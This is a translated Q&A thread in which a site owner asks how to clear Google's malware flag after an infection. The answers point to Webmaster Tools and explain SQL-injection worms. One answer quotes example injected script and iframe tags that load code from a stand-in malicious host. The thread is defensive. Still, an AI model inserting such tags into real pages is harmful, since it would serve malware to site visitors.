Meu site está infectado, restaurei um backup dos arquivos não infectados, quanto tempo demora para desmarcar como perigoso?

3

Meu site www.sagamountain.com foi recentemente infectado por um distribuidor de malware (ou pelo menos acho que pode ter sido).

Eu removi todo o conteúdo externo, anúncios do Google, bate-papo do vaga-lume, etc.

Enviei um backup de algumas semanas atrás, quando não houve nenhum problema.

Eu atualizei o furo de injeção de SQL.

Agora, quanto tempo demora para desmarcá-lo como perigoso? Onde posso entrar em contato com o Google?

Não tenho certeza se esse é o lugar certo para publicá-lo, mas como pode ter sido um problema no servidor, também posso. Os sites podem injetar código base64 através de um vírus em todo o servidor, ou é apenas via injeção de sql?

Obrigado pela ajuda, os vírus me assustam.

Existe um antivírus on-line que pode escanear minha página e me dizer o que está errado?

    
por Cyclone 26.10.2009 / 20:29

2 respostas

4

Em relação ao Google, reveja a página deles sobre sites infectados por malware.

Meu site e o Google ›Meu site foi invadido

Você deverá acessar sua página de Ferramentas para webmasters , adicionar seu site a sua conta e realizar as etapas de verificação. Em seguida, você terá acesso para fazer coisas como solicitar que seu site seja revisado e não seja mais infectado.

    
por 26.10.2009 / 21:15
3

Este é um problema relativamente comum nos dias de hoje. Muitos worms tentam se inserir no código do servidor por meio de injeção SQL, ou modificando o conteúdo .html local que é carregado em um servidor web. Normalmente eles vão tentar colocar:

<script src='http://badwebsite.ru/blah.js'></script>

ou

<iframe src='http://badwebsite.ru/blah.html' />

na sua página de origem via injeção SQL ou modificação de código fonte.

Até onde eu sei, os worms modificam seus vetores de ataque através de mecanismos de ofuscação do JavaScript ou similares e são difíceis de serem verificados.

Estes ataques foram possíveis graças a duas recentes e enormes execuções de código remoto:

  • explorações do Adobe Flash JavaScript que permitem que um objeto Flash seja criado com cerca de 15K de código arbitrário.
  • Uma exploração da extensão do Windows Presentation Framework no Firefox instalado pelo Microsoft .NET 3.5 em sistemas Windows.

Ambos são enormes riscos de segurança.

Você deve usar a associação de parâmetros no desenvolvimento de aplicativos da Web sempre que possível para evitar ataques de injeção de SQL.

    
por 26.10.2009 / 20:36